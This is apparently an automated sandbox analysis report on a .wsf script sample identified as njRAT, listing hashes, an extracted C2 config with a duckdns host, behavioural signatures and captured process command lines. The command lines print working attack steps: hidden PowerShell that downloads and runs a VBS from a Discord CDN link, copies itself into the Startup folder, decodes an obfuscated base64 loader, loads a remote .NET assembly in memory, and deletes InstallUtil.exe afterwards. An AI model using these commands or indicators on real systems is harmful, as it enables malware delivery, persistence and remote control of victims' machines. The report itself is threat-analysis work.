Analysis
-
max time kernel
91s -
max time network
100s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
06/10/2022, 17:04
Static task
static1
Behavioral task
behavioral1
Sample
1f9af4f8289740daa05ccfead19a29a9.wsf
Resource
win7-20220812-en
General
-
Target
1f9af4f8289740daa05ccfead19a29a9.wsf
-
Size
53KB
-
MD5
1f9af4f8289740daa05ccfead19a29a9
-
SHA1
4c8703ecd5c150015f0e49243119ad26d672fe06
-
SHA256
86f4317f0c4ae86c9a37a380a1bcd18a0bef3077a808b93110cd774697c66439
-
SHA512
59acad54bf9274550bfa345b00bd7015bee7dec231fb562490aa2459383698a59b4d4658af575fea78300adaf0f580de04227c2a749f87f8daf37e63bf1ce124
-
SSDEEP
192:L48w8Nlb0bqGW6CCCuqpSS48w8Nlb0bqGW6CCCuqpd48w8Nlb0bqGW6CCCuqpJ:dwSb0cJqUwSb0cJzwSb0cJR
Malware Config
Extracted
https://tinyurl.com/2erph6cs
Extracted
njrat
0.7NC
NYAN CAT
wins0310ok.duckdns.org:8000
2a624df8c6c4469
-
reg_key
2a624df8c6c4469
-
splitter
@!#&^%$
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 6 1368 powershell.exe 14 4792 powershell.exe 15 4792 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ایسش.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ایسش.vbs powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4792 set thread context of 1148 4792 powershell.exe 92 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings explorer.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1368 powershell.exe 1368 powershell.exe 1612 powershell.exe 1612 powershell.exe 4792 powershell.exe 4792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 1368 powershell.exe Token: SeDebugPrivilege 1612 powershell.exe Token: SeDebugPrivilege 4792 powershell.exe Token: SeDebugPrivilege 1148 InstallUtil.exe Token: 33 1148 InstallUtil.exe Token: SeIncBasePriorityPrivilege 1148 InstallUtil.exe Token: 33 1148 InstallUtil.exe Token: SeIncBasePriorityPrivilege 1148 InstallUtil.exe Token: 33 1148 InstallUtil.exe Token: SeIncBasePriorityPrivilege 1148 InstallUtil.exe Token: 33 1148 InstallUtil.exe Token: SeIncBasePriorityPrivilege 1148 InstallUtil.exe Token: 33 1148 InstallUtil.exe Token: SeIncBasePriorityPrivilege 1148 InstallUtil.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2492 wrote to memory of 1368 2492 WScript.exe 81 PID 2492 wrote to memory of 1368 2492 WScript.exe 81 PID 1368 wrote to memory of 3532 1368 powershell.exe 83 PID 1368 wrote to memory of 3532 1368 powershell.exe 83 PID 4060 wrote to memory of 2072 4060 explorer.exe 85 PID 4060 wrote to memory of 2072 4060 explorer.exe 85 PID 2072 wrote to memory of 1612 2072 WScript.exe 86 PID 2072 wrote to memory of 1612 2072 WScript.exe 86 PID 1612 wrote to memory of 4792 1612 powershell.exe 88 PID 1612 wrote to memory of 4792 1612 powershell.exe 88 PID 4792 wrote to memory of 1148 4792 powershell.exe 92 PID 4792 wrote to memory of 1148 4792 powershell.exe 92 PID 4792 wrote to memory of 1148 4792 powershell.exe 92 PID 4792 wrote to memory of 1148 4792 powershell.exe 92 PID 4792 wrote to memory of 1148 4792 powershell.exe 92 PID 4792 wrote to memory of 1148 4792 powershell.exe 92 PID 4792 wrote to memory of 1148 4792 powershell.exe 92 PID 4792 wrote to memory of 1148 4792 powershell.exe 92 PID 1148 wrote to memory of 580 1148 InstallUtil.exe 98 PID 1148 wrote to memory of 580 1148 InstallUtil.exe 98 PID 1148 wrote to memory of 580 1148 InstallUtil.exe 98
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1f9af4f8289740daa05ccfead19a29a9.wsf"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'https://cdn.discordapp.com/attachments/1026576632913342517/1027267777003802644/008.vbs' -o C:\Windows\Temp\nLeNPdi.vbs;explorer.exe C:\Windows\Temp\nLeNPdi.vbs;Start-Sleep 3;[System.IO.File]::Copy('ایسش.wsf','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ایسش.wsf');Start-Sleep 1;rm *.pif,*.uue2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe" C:\Windows\Temp\nLeNPdi.vbs3⤵PID:3532
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\nLeNPdi.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwCsAK8A+gDwAOQAugDXAOQAJwA7AFsAQgB5AHQAZQBbAF0AXQAgACQARABMAEwAIAA9ACAAWwBzAHkAcwB0AG⌚⌚⌚AbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHQAaQBuAHkAdQByAGwALgBjAG8AbQAvADIAZQByAHAAaAA2AGMAcwAnACkAKQA7AFsAcwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAH⌚⌚⌚AcgByAG⌚⌚⌚AbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAG⌚⌚⌚AKAAnAE4AdwBnAG8AeABNAC4ASwBQAEoAYQBOAGoAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFAAVQBsAEcASwBBACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH⌚⌚⌚AbABsACwAIABbAG8AYgBqAG⌚⌚⌚AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AMAAwADAAOAB0AGMAbwAzADAALwA2ADEANgAzADIANAAxADAAOQA5ADEANAA2ADcANQA2ADIAMAAxAC8AMgAzADQANgA2ADAAMQA5ADQAOAA3ADYANQA3AD⌚⌚⌚ANgAyADAAMQAvAHMAdABuAG⌚⌚⌚AbQBoAGMAYQB0AHQAYQAvAG0AbwBjAC4AcABwAGEAZAByAG8AYwBzAGkAZAAuAG4AZABjAC8ALwA6AHMAcAB0AHQAaAAnACAALAAgACQA⌚⌚⌚gBvAGQAYQBDAG8AcAB5ACAALAAgACcAJwbMBjMGNAYnACAAKQApAA==';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('¬¯úðäº×ä', 'C:\Windows\Temp\nLeNPdi.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Windows\Temp\nLeNPdi.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://tinyurl.com/2erph6cs'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('txt.0008tco30/6163241099146756201/2346601948765756201/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $RodaCopy , 'ایسش' ))"4⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\SysWOW64\cmd.execmd.exe /C Y /N /D Y /T 1 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"6⤵PID:580
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
1KB
MD5b8a507ea87f4db23962b175b90889f86
SHA1d7957c02ed987bbf866c98e4491a926b5453c58d
SHA256291a53a8822be2c1b654a400ccd6fbbbf90712d4eb2078ccd2d10824d4de4e2b
SHA51223c6774e1c2bb07e9eb814b60b040ebaea933bc664b9eebfa741495e89a8568ff86653b4efa58595fa94f7aff0216d132db96a871ca78600fea3e5c08b9d2bea
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
217KB
MD512acd97038a0f71c7798a9f23da80c78
SHA16f71758dd0ab7d57bb6886b8b10658d476aa2391
SHA256abdcf0cce360090b0d36306cd6cd6d460904993eaafb2b3fa70b6bc56210558e
SHA512dedd4b55ede48c6b7e376933ad9a8f58b25d0aea3a48c8d461a2988463dcb97025cb2cb8ce98e2994a3d00bb515aaed6671eac0d110115cad56e53f5b049efa9